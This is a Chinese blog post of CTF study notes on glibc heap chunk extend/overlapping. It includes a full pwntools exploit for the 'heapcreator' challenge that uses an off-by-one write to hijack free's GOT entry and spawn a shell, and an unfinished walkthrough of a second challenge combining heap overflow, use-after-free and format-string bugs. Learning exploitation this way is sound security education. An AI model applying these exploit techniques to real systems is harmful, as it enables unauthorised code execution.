



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="清風微醺" href="https://www.wdqjxtmph.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="清風微醺" href="https://www.wdqjxtmph.top/atom.xml" />
<link rel="alternate" type="application/json" title="清風微醺" href="https://www.wdqjxtmph.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="堆" />


<link rel="canonical" href="https://www.wdqjxtmph.top/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/">



  <title>
堆学习-Chunk Overlapping - 学习笔记 |
Loτυs = 清風微醺 = 凌恒</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">堆学习-Chunk Overlapping
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-10-24 02:00:08">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-10-24T02:00:08+08:00">2021-10-24</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>11k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>10 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Loτυs</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipeyonbf9j20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giph47e9vtj20zk0m8x6l.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipeuibk9fj20zk0m8ay2.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipesng5oej20zk0m87d4.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicit31ffoj20zk0m8naf.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclil3m4ej20zk0m8tn8.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" itemprop="item" rel="index" title="分类于 学习笔记"><span itemprop="name">学习笔记</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://www.wdqjxtmph.top/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="Loτυs">
    <meta itemprop="description" content="凌恒, 凌恒山其若陋兮、">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="清風微醺">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>CTF-wiki 真是太好一学习网站了。</p>
<p>原文链接：<span class="exturl" data-url="aHR0cHM6Ly9jdGYtd2lraS5vcmcvcHduL2xpbnV4L3VzZXItbW9kZS9oZWFwL3B0bWFsbG9jMi9jaHVuay1leHRlbmQtb3ZlcmxhcHBpbmcvI18x">https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/chunk-extend-overlapping/#_1</span></p>
<h1 id="chunk-extend"><a class="markdownIt-Anchor" href="#chunk-extend">#</a> Chunk Extend</h1>
<h2 id="实现条件"><a class="markdownIt-Anchor" href="#实现条件">#</a> 实现条件</h2>
<p><strong>要实现 chunk extend 需要满足的条件</strong>：有堆漏洞，并且该漏洞可以修改 chunk header 里的数据。</p>
<h2 id="实现原理"><a class="markdownIt-Anchor" href="#实现原理">#</a> 实现原理</h2>
<p>原理大概就是：</p>
<p>①：ptmalloc 通过 chunk header 里面的 prev_size 和 size 来对前后堆块进行定位。</p>
<p>②：ptmalloc 通过查看下一个堆的 prev_inuse 值来判断该 chunk 是否被使用。（不能通过 prev_size 来判断，因为虽然 **” 该 chunk 为空时，下一个堆块的 pre_size 会记录该 chunk 的大小。“** 但是不能判断 pre_size 里记录的数据到底是上一个 chunk 的 size 还是上一个 chunk 的末尾数据）</p>
<p>因此我们如果能控制 chunk header 里面的数据，就可以导致 chunk overlapping，可以控制 chunk 里面的内容，如果可以控制的 chunk 内容范围里存在指针等，就可以修改指针值达到任意地址读写或者控制程序流程。</p>
<h2 id="实现步骤"><a class="markdownIt-Anchor" href="#实现步骤">#</a> 实现步骤</h2>
<p>个人笔记：①：fastbin 由于追求效率，安全检验机制机制较弱，free 时找到 fastbin 链表中符合大小的堆块就直接加入了，不会检测 pre_insue 的值。同时，物理地址相邻的 fastbin 不会合并。</p>
<p>​			   	②：fastbin 的最大使用范围为 0x70，若不属于 fastbin，在合并时会与 topchunk 合并。因此 free 的堆块必须和 top chunk 中间需要有一个小堆块将这两者隔开。</p>
<p>​				   ③：通过 extend 前向 overlapping，利用的是 unlink 机制，修改 free 掉的堆块的 prev_insue 值和 prev_size 值即可。</p>
<p>具体见上文中链接。</p>
<h1 id="例题一"><a class="markdownIt-Anchor" href="#例题一">#</a> 例题一</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMWdKQ0NQODF4ZWdBRlpHUHM3aEpWUnc=">https://pan.baidu.com/s/1gJCCP81xegAFZGPs7hJVRw</span><br>
 提取码：F1re</p>
<p>很友好的一道题，题目是常见的菜单。</p>
<p>checksec 一下：</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey2zn4zjj30de03n0u9.jpg" alt="10"></p>
<p>gdb 调试后还原堆结构体：</p>
<p><img data-src="https://tvax3.sinaimg.cn/large/008qDYGVgy1gwey0utazpj30og0dx76q.jpg" alt="1"></p>
<ul>
<li>
<p>功能一：create_heap: 在选择创造堆块的功能时，系统会先自动分配了 0x20 的内存，拿来存放结构体。然后可以分配用户输入的大小的堆。</p>
</li>
<li>
<p>功能二：edit_heap：能修改堆块的 content 值，查看 read_input 函数后发现存在 off-by-one 漏洞，可以通过该漏洞在一定条件下覆盖下一个堆块的 size 值。</p>
</li>
<li>
<p>功能三：show_heap：将 content size 的值和 content 打印出来。</p>
</li>
<li>
<p>功能四：delete_heap：先 free 掉我们的 content 部分，然后 free 掉系统帮我们自动申请的 struct 部分，最后将堆指针置为零。</p>
</li>
</ul>
<h2 id="基本思路"><a class="markdownIt-Anchor" href="#基本思路">#</a> 基本思路</h2>
<p>该题满足了实现 chunk-extend 的两个条件。因此我的基本思路是：</p>
<p>①：创建两个堆，利用 edit_heap 函数的 off-by-one 漏洞修改第一个堆的 content 值，然后覆盖修改第二个堆的 chunk header 里面的 size 值。</p>
<p>②：通过 delete_heap 函数 free 掉第二个堆，再通过 create_heap 函数重新申请回来，造成 chunk-overlapping，即可使 chunk header 里的指针域处于可修改的 content 域中，可控制指针，达到任意地址跳转和读写。</p>
<p>③：改写 free_got 成 system 函数地址，并在 free 的参数里放置 “/bin/sh&quot;, 最后利用 delete_heap 函数调用 free 函数实现 get shell。</p>
<h3 id="实现步骤1"><a class="markdownIt-Anchor" href="#实现步骤1">#</a> 实现步骤①：</h3>
<p>这是正常创建两个堆后的内存图，content size 均为 0x10.</p>
<p><img data-src="https://tvax1.sinaimg.cn/large/008qDYGVgy1gwey1960wxj30hb05oq8p.jpg" alt="2"></p>
<p>由于我们能输入到 content 里面的数据是 content size+1 个，因此我们最多只能覆盖到 0x6032d0 的第一个字节，也就是覆盖到第二个堆块的 prev_size 字节。但我们知道，前一个堆不为空的时候，该堆的 prev_size 是不起作用的，置为 0，而此时该堆的 prev_size 是可以拿来储存物理相邻的前一个堆的数据的 (<strong>该机制被称为 chunk 的空间复用</strong>)。且根据堆分配机制，用户请求的字节是拿来储存数据的，若我们一开始给 heap1 请求 0x18 的内存，由于 chunk 空间复用的关系，系统只会多分配 0x10 的内存给 heap1，而由于 edit_heap 函数里的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">read_input(*((<span class="keyword">void</span> **)*(&amp;heaparray + v1) + <span class="number">1</span>), *(_QWORD *)*(&amp;heaparray + v1) + <span class="number">1LL</span>);</span><br></pre></td></tr></table></figure>
<p>因此我们可以读入 0x19 个字符，此时就可以覆盖到 heap2 的 size 字段。</p>
<p>实操：</p>
<p>先定义基本操作函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Size of Heap : &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Content of heap:&quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Content of heap : &quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br></pre></td></tr></table></figure>
<p>分配 heap1 和和 heap2，以及通过 edit 函数覆盖 heap2 struct 结构体里的 size 字段。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">create(<span class="number">0x18</span>,<span class="string">b&#x27;aaaaaaaa&#x27;</span>)</span><br><span class="line">create(<span class="number">0x10</span>,<span class="string">b&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line">pad = <span class="string">b&#x27;/bin/sh\0&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+<span class="string">b&#x27;\x41&#x27;</span></span><br><span class="line">edit(<span class="number">0</span>,pad)</span><br></pre></td></tr></table></figure>
<p>这里 pad 里面为什么要加入’/bin/sh\0’先埋一个伏笔。</p>
<p>此时查看一下堆：</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey1hm10uj30eq053jw1.jpg" alt="3"></p>
<p>可以看到 heap2 的 size 字段确实被覆盖掉了。</p>
<h3 id="实现步骤2"><a class="markdownIt-Anchor" href="#实现步骤2">#</a> 实现步骤②：</h3>
<p>经过步骤一，heap2 的 struct 部分已经被系统看做是一块 0x40 大小的堆块（称作 s1，以便后面好讲述），content 部分是一块 0x20 大小的堆块（称作 s2）。这两个堆块的大小都属于 fastbin 的范围，由于<strong> fastbin 由于追求效率，安全检验机制机制较弱，free 时找到 fastbin 链表中符合大小的堆块就直接加入了，不会检测 pre_insue 的值。同时，物理地址相邻的 fastbin 不会合并</strong>，因此我们直接 free 掉 heap2 就会将 s1 与 s2 置入 fastbin 链表中（这道题我的环境置入了 tcachebins 链表，应该是由于我的本地 libc 高于它的版本导致的，不过 tcachebins 与 fastbin 性质相似。）</p>
<p>如图，已含有 0x20 与 0x40 大小的空闲堆。</p>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwey1q0xfzj307k02e74u.jpg" alt="4"></p>
<p>同时，原堆处变成了这样：</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey1vyto5j30et0510wy.jpg" alt="5"></p>
<p>此时我们 create 新的 heap2 时，系统会先自动分配一个 0x20 大小的结构体，这时 tcachebins 链表里 0x20 空闲的堆块就被拿回来继续用了，也就是上图中的 2，若我们申请 0x30 大小，系统会返回 0x40 大小的堆块，而 tcachebins 链表中也有 0x40 空闲的堆块，也就是上图中的 1。（注意，申请相同大小才能从 fastbin 或者 tcachebins 中直接取堆块，因此申请 0x30 是有讲究的）。这样我们就实现了原来的 struct 部分拿来充当 content，而原来的 content 部分拿来充当 struct。而我们能够输入 0x31 大小的数据，足够覆盖到新 struct 部分的指针处了。而 edit_heap 函数可以改变指针所指地方的内容，show_heap 又可输出指针所指地方的内容。因此我们就实现了任意地址读写的功能。</p>
<p>同时由于 edit_heap 函数里读入字符串长度依旧由 struct 部分里的 content size 决定：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">read_input(*((<span class="keyword">void</span> **)*(&amp;heaparray + v1) + <span class="number">1</span>), *(_QWORD *)*(&amp;heaparray + v1) + <span class="number">1LL</span>);</span><br></pre></td></tr></table></figure>
<p>（<strong>所以新 struct 里的 content size 还是得写入 0x30，</strong>。）</p>
<p>同时这道题没有开启 FULL RELRO, 因此可以改写函数 GOT 表。最终我们改写 free 函数 GOT 表后，调用 delete_heap 函数，第一个 free 里的参数是：content 里面的值，故我们之前在 heap1 的 content 里布置了’/bin/sh\0’, 其中‘\0’拿来截断，伏笔消除。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">free</span>(*((<span class="keyword">void</span> **)*(&amp;heaparray + v1) + <span class="number">1</span>))</span><br></pre></td></tr></table></figure>
<h2 id="exp"><a class="markdownIt-Anchor" href="#exp">#</a> exp：</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment"># r = process(&#x27;/mnt/hgfs/ubuntu/heapcreator&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/heapcreator&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/libc.so.6&#x27;</span>)</span><br><span class="line">r = process([<span class="string">&#x27;/mnt/hgfs/ubuntu/heapcreator&#x27;</span>],env=&#123;<span class="string">&quot;LD_PRELOAD&quot;</span>:<span class="string">&quot;./libc.so.6&quot;</span>&#125;)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Size of Heap : &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Content of heap:&quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Content of heap : &quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Index :&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line">    free_got=elf.got[<span class="string">&quot;free&quot;</span>]</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">hex</span>(free_got))</span><br><span class="line">    create(<span class="number">0x18</span>,<span class="string">b&#x27;aaaaaaaa&#x27;</span>)</span><br><span class="line">    create(<span class="number">0x10</span>,<span class="string">b&#x27;bbbbbbbb&#x27;</span>)</span><br><span class="line">    pad = <span class="string">b&#x27;/bin/sh\0&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+<span class="string">b&#x27;\x41&#x27;</span></span><br><span class="line">    edit(<span class="number">0</span>,pad)</span><br><span class="line">    delete(<span class="number">1</span>)</span><br><span class="line">    gdb.attach(r)</span><br><span class="line">    pause()</span><br><span class="line">    write_free_got = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+p64(<span class="number">0x30</span>)+p64(free_got)</span><br><span class="line">    create(<span class="number">0x30</span>,write_free_got)</span><br><span class="line">    show(<span class="number">1</span>)</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Content : &quot;</span>)</span><br><span class="line">    free_addr = u64(r.recvuntil(<span class="string">&quot;\n&quot;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;Done !&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">hex</span>(free_addr))</span><br><span class="line">    libc_base = free_addr-libc.sym[<span class="string">&#x27;free&#x27;</span>]</span><br><span class="line">    system_addr = libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">    edit_free_got = p64(system_addr)</span><br><span class="line">    edit(<span class="number">1</span>,edit_free_got)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line">    r.interactive()</span><br><span class="line">    <span class="comment"># gdb.attach(r)</span></span><br><span class="line">    <span class="comment"># pause()</span></span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure>
<h1 id="例题二"><a class="markdownIt-Anchor" href="#例题二">#</a> 例题二：</h1>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMURnY2p4dkVHMzNDc1pNcUlKZUg1dHc=">https://pan.baidu.com/s/1DgcjxvEG33CsZMqIJeH5tw</span><br>
 提取码：F1re</p>
<p>题目是一个订书系统。定义了三个堆块，book1 的堆块，book2 的堆块，dest 的堆块以及最后储存所有订书信息的堆块 v5。</p>
<p>checksec 一下</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey39dv5fj30c403mab9.jpg" alt="11"></p>
<p>实现了功能：</p>
<p>①：修改 book1 和 book2 的堆块里的内容。</p>
<p>②：删除某一个订单。</p>
<p>③：结束订书，打印订单结果。</p>
<p><strong>因为我写这个博客写了好几天，因此这里面 gdb 调试的地址不太相同。</strong></p>
<h2 id="漏洞函数"><a class="markdownIt-Anchor" href="#漏洞函数">#</a> 漏洞函数</h2>
<h3 id="堆溢出"><a class="markdownIt-Anchor" href="#堆溢出">#</a> 堆溢出</h3>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwey262didj30hk0aljue.jpg" alt="6"></p>
<p>函数只要不键入回车就不会停止输入，有任意长度的堆溢出漏洞。</p>
<h3 id="uaf"><a class="markdownIt-Anchor" href="#uaf">#</a> UAF</h3>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey2c0o9xj30hk0aljue.jpg" alt="7"></p>
<p>函数 free 堆块后没有将堆指针置为 NULL。存在 UAF 漏洞。</p>
<h3 id="格式化字符串漏洞"><a class="markdownIt-Anchor" href="#格式化字符串漏洞">#</a> 格式化字符串漏洞</h3>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey2i9s4ej307m024dfz.jpg" alt="8"></p>
<p>以及函数退出前有一个格式化字符串漏洞。</p>
<h3 id="奇怪的字符输入长度"><a class="markdownIt-Anchor" href="#奇怪的字符输入长度">#</a> 奇怪的字符输入长度</h3>
<p><img data-src="https://tvax1.sinaimg.cn/large/008qDYGVgy1gwey2p9f8oj309g03uabe.jpg" alt="9"></p>
<p>按理来说只用读入一个字符即可，在程序开了 canary 保护下能读入这么多字符可能存在伏笔。</p>
<h2 id="思路分析"><a class="markdownIt-Anchor" href="#思路分析">#</a> 思路分析</h2>
<p>堆块里没有指针可以让我们修改，因此我们只能通过格式化字符串漏洞控制程序流程，控制 dest 里面的内容来实现篡改返回地址或者函数 GOT 表等。而 dest 里的内容本是固定的 &quot;Your order is submitted!\n&quot;，因此我们需要用前两个漏洞来实现对格式化字符串漏洞的利用。</p>
<p>我的最初想法通过堆溢出直接覆盖 dest 的值。后来发现：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&#x27;1&#x27;</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Enter first order:&quot;</span>);</span><br><span class="line">        sub_400876(v6);</span><br><span class="line">        <span class="built_in">strcpy</span>(dest, <span class="string">&quot;Your order is submitted!\n&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>对 dest 的赋值处于堆溢出漏洞之后，也就是说我们用堆溢出的方式无法覆盖改写 dest 里的内容。既然无法通过堆溢出，就只剩利用 submit 功能里的 strcpy 与 strcat 函数了。</p>
<p>那我们的步骤是：</p>
<p>①：适当计算后控制 dest 里的内容，第一次利用格式化字符串漏洞泄露出 libc 基址和劫持程序返回地址（<strong>修改 fini_array [0]</strong>）。</p>
<p>关于 fini_array 的介绍放在文章末尾。</p>
<p>通过覆盖 book2 的堆块 size 字段为 0x151，free book2 后执行 submit 函数，可达到 chunk extend 和 chunk overlapping 的目的。可以让 v5 堆块（储存所有信息的堆块）与原 book2 和 dest 堆块重合。然后通过 strcat 和 strcpy 操作就可以达到控制 dest 内容的目的。</p>
<p>②第二次利用格式化字符串漏洞修改返回地址为 one_gadget 地址。（由于 main 函数返回后没有调用任意函数，修改函数 GOT 表无法达到 getshell 的目的）</p>
<h2 id="具体实现"><a class="markdownIt-Anchor" href="#具体实现">#</a> 具体实现：</h2>
<p>计算一下如何往 book1 和 book2 堆块里填充内容才能在 dest 里构造出合理的格式化字符串。</p>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwey3l4smaj30lv092gop.jpg" alt="12"></p>
<p>实现 chunk overlapping（还没有执行 submit 函数）我们的堆分布是这样的：</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey3riz52j30jm0bmwpz.jpg" alt="13"></p>
<p>由 Submit 函数：</p>
